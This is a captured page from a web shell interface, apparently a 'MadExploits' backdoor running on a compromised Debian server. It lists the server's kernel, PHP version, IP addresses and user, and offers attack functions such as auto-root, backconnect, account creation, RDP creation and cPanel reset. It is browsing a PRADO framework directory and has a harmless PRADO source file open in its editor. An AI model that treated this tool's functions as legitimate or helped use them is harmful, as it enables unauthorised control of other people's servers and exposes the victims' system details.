Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.15.202.169
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
prado4.3.2 /
Data /
ActiveRecord /
[ HOME SHELL ]
Name
Size
Permission
Action
Exceptions
[ DIR ]
drwxr-xr-x
Relations
[ DIR ]
drwxr-xr-x
Scaffold
[ DIR ]
drwxr-xr-x
TActiveRecord.php
34.57
KB
-rw-r--r--
TActiveRecordChangeEventParame...
1.17
KB
-rw-r--r--
TActiveRecordConfig.php
4.96
KB
-rw-r--r--
TActiveRecordCriteria.php
871
B
-rw-r--r--
TActiveRecordGateway.php
13.63
KB
-rw-r--r--
TActiveRecordInvalidFinderResu...
951
B
-rw-r--r--
TActiveRecordManager.php
3.85
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TActiveRecordInvalidFinderResult.php
<?php /** * TActiveRecordInvalidFinderResult class file. * * @author Wei Zhuo <weizhuo[at]gmail[dot]com> * @link https://github.com/pradosoft/prado * @license https://github.com/pradosoft/prado/blob/master/LICENSE */ namespace Prado\Data\ActiveRecord; /** * TActiveRecordInvalidFinderResult class. * TActiveRecordInvalidFinderResult defines the enumerable type for possible results * if an invalid {@link TActiveRecord::__call magic-finder} invoked. * * The following enumerable values are defined: * - Null: return null (default) * - Exception: throws a TActiveRecordException * * @author Yves Berkholz <godzilla80@gmx.net> * @see TActiveRecordManager::setInvalidFinderResult * @see TActiveRecordConfig::setInvalidFinderResult * @see TActiveRecord::setInvalidFinderResult * @since 3.1.5 */ class TActiveRecordInvalidFinderResult extends \Prado\TEnumerable { public const Null = 'Null'; public const Exception = 'Exception'; }
Close